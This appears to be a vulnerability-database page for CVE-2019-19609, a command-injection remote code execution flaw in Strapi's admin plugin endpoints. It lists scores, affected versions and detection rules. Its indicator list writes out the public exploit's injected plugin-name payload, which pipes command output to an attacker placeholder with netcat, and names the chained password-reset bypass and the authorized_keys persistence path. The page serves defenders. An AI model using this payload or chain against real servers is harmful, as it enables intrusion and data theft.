cbcvebase.
CVE-2019-19609
published 2019-12-05

CVE-2019-19609: The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because…

PriorityP179high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
54.08%
98.9th percentile
The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because it does not sanitize the plugin name, and attackers can inject arbitrary shell commands to be executed by the execa function.

Affected

3 ranges
VendorProductVersion rangeFixed in
strapistrapi<= 1.6.4
strapistrapi
strapistrapi>= 0 < 3.0.0-beta.17.83.0.0-beta.17.8

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://api-prod.horizontall.htb/admin/plugins/install
url/admin/plugins/install
path/tmp/.m3
commanddocumentation && $(command > /tmp/.m3 && nc LHOST 9999 < /tmp/.m3 | rm /tmp/.m3)
commanddocumentation && $(cmd)
port9999
url/admin/auth/reset-password
url/admin/init
path/opt/strapi/.ssh/authorized_keys
  • Detect POST requests to /admin/plugins/install endpoint with a 'plugin' field containing shell metacharacters such as '&&' or '$(' indicating command injection via the unsanitized plugin name parameter.
  • Monitor for POST requests to /admin/plugins/install carrying a JSON body where the 'plugin' value contains shell command substitution patterns (e.g., '$(...)').
  • Alert on outbound netcat (nc) connections spawned by the Strapi/Node.js process, particularly to ephemeral attacker-controlled IPs on port 9999, as this is the default exfil port used by the public exploit.
  • Detect creation of the file /tmp/.m3 by the Strapi process, which is used as a temporary output buffer by the authenticated RCE exploit.
  • Monitor unauthenticated POST requests to /admin/auth/reset-password with a JSON body containing a MongoDB-style operator key '$gt' in the 'code' field, indicating exploitation of CVE-2019-18818 used as a precursor to this RCE.
  • Flag requests to /admin/init endpoint that enumerate the Strapi version, as attackers use this to confirm a vulnerable version (3.0.0-beta.17.4 or lower) before launching the exploit.
  • ·The RCE is blind — command output is not returned inline in the HTTP response; attackers must use out-of-band channels (e.g., netcat reverse shell or curl to attacker-controlled server) to retrieve results.
  • ·The vulnerability affects Strapi versions up to and including 3.0.0-beta.17.7; the fix was introduced in 3.0.0-beta.17.8.
  • ·The injection point is the unsanitized 'plugin' name field passed to the execa function; both the Install (/admin/plugins/install) and Uninstall plugin endpoints are affected.

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.